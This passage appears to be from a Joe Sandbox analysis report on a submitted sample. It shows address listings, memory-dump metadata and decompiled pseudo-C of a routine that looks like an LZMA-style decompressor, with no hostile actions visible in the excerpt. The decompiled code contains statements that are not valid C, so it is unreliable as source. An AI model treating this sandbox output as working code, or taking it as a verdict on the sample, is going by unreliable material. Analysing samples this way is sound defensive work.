                                                  0x00406699
                                                  0x0040669c
                                                  0x004066a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004066f0
                                                  0x004066f0
                                                  0x004066f4
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066fe
                                                  0x00406701
                                                  0x0040670b
                                                  0x00000000
                                                  0x0040670b
                                                  0x004066f6
                                                  0x004066f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00406717
                                                  0x00406717
                                                  0x0040671b
                                                  0x00406722
                                                  0x00406725
                                                  0x00406728
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040672b
                                                  0x0040672e
                                                  0x00406731
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406744
                                                  0x00406749
                                                  0x00000000
                                                  0x00000000
                                                  0x004067d7
                                                  0x004067d7
                                                  0x004067db
                                                  0x00406b79
                                                  0x00406b79
                                                  0x00000000
                                                  0x00406b79
                                                  0x004067e1
                                                  0x004067e1
                                                  0x004067e4
                                                  0x004067e7
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f4
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f9
                                                  0x004067fc
                                                  0x00000000
                                                  0x00000000
                                                  0x004063cc
                                                  0x004063cc
                                                  0x004063d0
                                                  0x00406b3d
                                                  0x00406b3d
                                                  0x00000000
                                                  0x00406b3d
                                                  0x004063d6
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063fd
                                                  0x004063fd
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406434
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406467
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406470
                                                  0x00406477
                                                  0x0040647a
                                                  0x00000000
                                                  0x00406480
                                                  0x00406480
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406485
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064cd
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
                                                  • Instruction ID: 0a364959098a1219693739684ad0890dad76377db1f96b1360ce1028e8ac0eba
                                                  • Opcode Fuzzy Hash: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
                                                  • Instruction Fuzzy Hash: 7EA15371E00229CBDF28DFA8C8447ADBBB1FB45305F11816ED816BB281C7786A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E00406969() {
                                                  				void _t533;
                                                  				signed int _t534;
                                                  				signed int _t535;
                                                  				signed int* _t605;
                                                  				void* _t612;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					if( *(_t612 - 0x40) != 0) {
                                                  						 *(_t612 - 0x84) = 0x13;
                                                  						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                  						goto L132;
                                                  					} else {
                                                  						__eax =  *(__ebp - 0x4c);
                                                  						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                  						__ecx =  *(__ebp - 0x58);
                                                  						__eax =  *(__ebp - 0x4c) << 4;
                                                  						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                  						L130:
                                                  						 *(__ebp - 0x58) = __eax;
                                                  						 *(__ebp - 0x40) = 3;
                                                  						L144:
                                                  						 *(__ebp - 0x7c) = 0x14;
                                                  						L145:
                                                  						__eax =  *(__ebp - 0x40);
                                                  						 *(__ebp - 0x50) = 1;
                                                  						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                  						L149:
                                                  						if( *(__ebp - 0x48) <= 0) {
                                                  							__ecx =  *(__ebp - 0x40);
                                                  							__ebx =  *(__ebp - 0x50);
                                                  							0 = 1;
                                                  							__eax = 1 << __cl;
                                                  							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                  							__eax =  *(__ebp - 0x7c);
                                                  							 *(__ebp - 0x44) = __ebx;
                                                  							while(1) {
                                                  								L140:
                                                  								 *(_t612 - 0x88) = _t533;
                                                  								while(1) {
                                                  									L1:
                                                  									_t534 =  *(_t612 - 0x88);
                                                  									if(_t534 > 0x1c) {
                                                  										break;
                                                  									}
                                                  									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
                                                  										case 0:
                                                  											if( *(_t612 - 0x6c) == 0) {
                                                  												goto L170;
                                                  											}
                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                  											_t534 =  *( *(_t612 - 0x70));
                                                  											if(_t534 > 0xe1) {
                                                  												goto L171;
                                                  											}
                                                  											_t538 = _t534 & 0x000000ff;
                                                  											_push(0x2d);
                                                  											asm("cdq");
                                                  											_pop(_t569);
                                                  											_push(9);
                                                  											_pop(_t570);
                                                  											_t608 = _t538 / _t569;
                                                  											_t540 = _t538 % _t569 & 0x000000ff;
                                                  											asm("cdq");
                                                  											_t603 = _t540 % _t570 & 0x000000ff;
                                                  											 *(_t612 - 0x3c) = _t603;
                                                  											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                  											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                  											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                  											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                  												L10:
                                                  												if(_t611 == 0) {
                                                  													L12:
                                                  													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                  													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                  													goto L15;
                                                  												} else {
                                                  													goto L11;
                                                  												}
                                                  												do {
                                                  													L11:
                                                  													_t611 = _t611 - 1;
                                                  													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                  												} while (_t611 != 0);
                                                  												goto L12;
                                                  											}
                                                  											if( *(_t612 - 4) != 0) {
                                                  												GlobalFree( *(_t612 - 4));
                                                  											}
                                                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                  											 *(_t612 - 4) = _t534;
                                                  											if(_t534 == 0) {
                                                  												goto L171;
                                                  											} else {
                                                  												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                  												goto L10;
                                                  											}
                                                  										case 1:
                                                  											L13:
                                                  											__eflags =  *(_t612 - 0x6c);
                                                  											if( *(_t612 - 0x6c) == 0) {
                                                  												 *(_t612 - 0x88) = 1;
                                                  												goto L170;
                                                  											}
                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                  											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                  											_t45 = _t612 - 0x48;
                                                  											 *_t45 =  *(_t612 - 0x48) + 1;
                                                  											__eflags =  *_t45;
                                                  											L15:
                                                  											if( *(_t612 - 0x48) < 4) {
                                                  												goto L13;
                                                  											}
                                                  											_t546 =  *(_t612 - 0x40);
                                                  											if(_t546 ==  *(_t612 - 0x74)) {
                                                  												L20:
                                                  												 *(_t612 - 0x48) = 5;
                                                  												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                  												goto L23;
                                                  											}
                                                  											 *(_t612 - 0x74) = _t546;
                                                  											if( *(_t612 - 8) != 0) {
                                                  												GlobalFree( *(_t612 - 8));
                                                  											}
                                                  											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                  											 *(_t612 - 8) = _t534;
                                                  											if(_t534 == 0) {
                                                  												goto L171;
                                                  											} else {
                                                  												goto L20;
                                                  											}
                                                  										case 2:
                                                  											L24:
                                                  											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                  											 *(_t612 - 0x84) = 6;
                                                  											 *(_t612 - 0x4c) = _t553;
                                                  											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                  											goto L132;
                                                  										case 3:
                                                  											L21:
                                                  											__eflags =  *(_t612 - 0x6c);
                                                  											if( *(_t612 - 0x6c) == 0) {
                                                  												 *(_t612 - 0x88) = 3;
                                                  												goto L170;
                                                  											}
                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                  											_t67 = _t612 - 0x70;
                                                  											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                  											__eflags =  *_t67;
                                                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                  											L23:
                                                  											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                  											if( *(_t612 - 0x48) != 0) {
                                                  												goto L21;
                                                  											}
                                                  											goto L24;
                                                  										case 4:
                                                  											L133:
                                                  											_t531 =  *_t605;
                                                  											_t588 = _t531 & 0x0000ffff;
                                                  											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                  											if( *(_t612 - 0xc) >= _t564) {
                                                  												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                  												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                  												 *(_t612 - 0x40) = 1;
                                                  												_t532 = _t531 - (_t531 >> 5);
                                                  												__eflags = _t532;
                                                  												 *_t605 = _t532;
                                                  											} else {
                                                  												 *(_t612 - 0x10) = _t564;
                                                  												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                  												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                  											}
                                                  											if( *(_t612 - 0x10) >= 0x1000000) {
                                                  												goto L139;
                                                  											} else {
                                                  												goto L137;
                                                  											}
                                                  										case 5:
                                                  											L137:
                                                  											if( *(_t612 - 0x6c) == 0) {
                                                  												 *(_t612 - 0x88) = 5;
                                                  												goto L170;
                                                  											}
                                                  											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                  											L139:
                                                  											_t533 =  *(_t612 - 0x84);
                                                  											goto L140;
                                                  										case 6:
                                                  											__edx = 0;
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) = 1;
                                                  												 *(__ebp - 0x84) = 7;
                                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                  												goto L132;
                                                  											}
                                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  											__esi =  *(__ebp - 0x60);
                                                  											__cl = 8;
                                                  											__cl = 8 -  *(__ebp - 0x3c);
                                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  											__ecx =  *(__ebp - 0x3c);
                                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  											__ecx =  *(__ebp - 4);
                                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  											__eflags =  *(__ebp - 0x38) - 4;
                                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  											if( *(__ebp - 0x38) >= 4) {
                                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                                  												if( *(__ebp - 0x38) >= 0xa) {
                                                  													_t98 = __ebp - 0x38;
                                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                                  													__eflags =  *_t98;
                                                  												} else {
                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  												}
                                                  											} else {
                                                  												 *(__ebp - 0x38) = 0;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                                  											if( *(__ebp - 0x34) == __edx) {
                                                  												__ebx = 0;
                                                  												__ebx = 1;
                                                  												goto L61;
                                                  											} else {
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__ecx =  *(__ebp - 8);
                                                  												__ebx = 0;
                                                  												__ebx = 1;
                                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  												goto L41;
                                                  											}
                                                  										case 7:
                                                  											__eflags =  *(__ebp - 0x40) - 1;
                                                  											if( *(__ebp - 0x40) != 1) {
                                                  												__eax =  *(__ebp - 0x24);
                                                  												 *(__ebp - 0x80) = 0x16;
                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  												__eax =  *(__ebp - 0x28);
                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  												__al = __al & 0x000000fd;
                                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                  												__eax =  *(__ebp - 4);
                                                  												__eax =  *(__ebp - 4) + 0x664;
                                                  												__eflags = __eax;
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												goto L69;
                                                  											}
                                                  											__eax =  *(__ebp - 4);
                                                  											__ecx =  *(__ebp - 0x38);
                                                  											 *(__ebp - 0x84) = 8;
                                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                  											goto L132;
                                                  										case 8:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x84) = 0xa;
                                                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                  											} else {
                                                  												__eax =  *(__ebp - 0x38);
                                                  												__ecx =  *(__ebp - 4);
                                                  												__eax =  *(__ebp - 0x38) + 0xf;
                                                  												 *(__ebp - 0x84) = 9;
                                                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                  											}
                                                  											goto L132;
                                                  										case 9:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												goto L90;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x60);
                                                  											if( *(__ebp - 0x60) == 0) {
                                                  												goto L171;
                                                  											}
                                                  											__eax = 0;
                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                  											__eflags = _t259;
                                                  											0 | _t259 = _t259 + _t259 + 9;
                                                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                  											goto L76;
                                                  										case 0xa:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x84) = 0xb;
                                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                  												goto L132;
                                                  											}
                                                  											__eax =  *(__ebp - 0x28);
                                                  											goto L89;
                                                  										case 0xb:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__ecx =  *(__ebp - 0x24);
                                                  												__eax =  *(__ebp - 0x20);
                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  											} else {
                                                  												__eax =  *(__ebp - 0x24);
                                                  											}
                                                  											__ecx =  *(__ebp - 0x28);
                                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  											L89:
                                                  											__ecx =  *(__ebp - 0x2c);
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  											L90:
                                                  											__eax =  *(__ebp - 4);
                                                  											 *(__ebp - 0x80) = 0x15;
                                                  											__eax =  *(__ebp - 4) + 0xa68;
                                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                  											goto L69;
                                                  										case 0xc:
                                                  											L100:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xc;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t335 = __ebp - 0x70;
                                                  											 *_t335 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t335;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											__eax =  *(__ebp - 0x2c);
                                                  											goto L102;
                                                  										case 0xd:
                                                  											L37:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xd;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t122 = __ebp - 0x70;
                                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t122;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L39:
                                                  											__eax =  *(__ebp - 0x40);
                                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                  												goto L48;
                                                  											}
                                                  											__eflags = __ebx - 0x100;
                                                  											if(__ebx >= 0x100) {
                                                  												goto L54;
                                                  											}
                                                  											L41:
                                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                  											__ecx =  *(__ebp - 0x58);
                                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                  											 *(__ebp - 0x48) = __eax;
                                                  											__eax = __eax + 1;
                                                  											__eax = __eax << 8;
                                                  											__eax = __eax + __ebx;
                                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  											__ax =  *__esi;
                                                  											 *(__ebp - 0x54) = __esi;
                                                  											__edx = __ax & 0x0000ffff;
                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  												__cx = __ax;
                                                  												 *(__ebp - 0x40) = 1;
                                                  												__cx = __ax >> 5;
                                                  												__eflags = __eax;
                                                  												__ebx = __ebx + __ebx + 1;
                                                  												 *__esi = __ax;
                                                  											} else {
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                  												 *(__ebp - 0x10) = __ecx;
                                                  												0x800 = 0x800 - __edx;
                                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  												__ebx = __ebx + __ebx;
                                                  												 *__esi = __cx;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  											 *(__ebp - 0x44) = __ebx;
                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                  												goto L39;
                                                  											} else {
                                                  												goto L37;
                                                  											}
                                                  										case 0xe:
                                                  											L46:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xe;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t156 = __ebp - 0x70;
                                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t156;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											while(1) {
                                                  												L48:
                                                  												__eflags = __ebx - 0x100;
                                                  												if(__ebx >= 0x100) {
                                                  													break;
                                                  												}
                                                  												__eax =  *(__ebp - 0x58);
                                                  												__edx = __ebx + __ebx;
                                                  												__ecx =  *(__ebp - 0x10);
                                                  												__esi = __edx + __eax;
                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  												__ax =  *__esi;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__edi = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													_t170 = __edx + 1; // 0x1
                                                  													__ebx = _t170;
                                                  													__cx = __ax >> 5;
                                                  													__eflags = __eax;
                                                  													 *__esi = __ax;
                                                  												} else {
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edi;
                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  													__ebx = __ebx + __ebx;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													continue;
                                                  												} else {
                                                  													goto L46;
                                                  												}
                                                  											}
                                                  											L54:
                                                  											_t173 = __ebp - 0x34;
                                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                  											__eflags =  *_t173;
                                                  											goto L55;
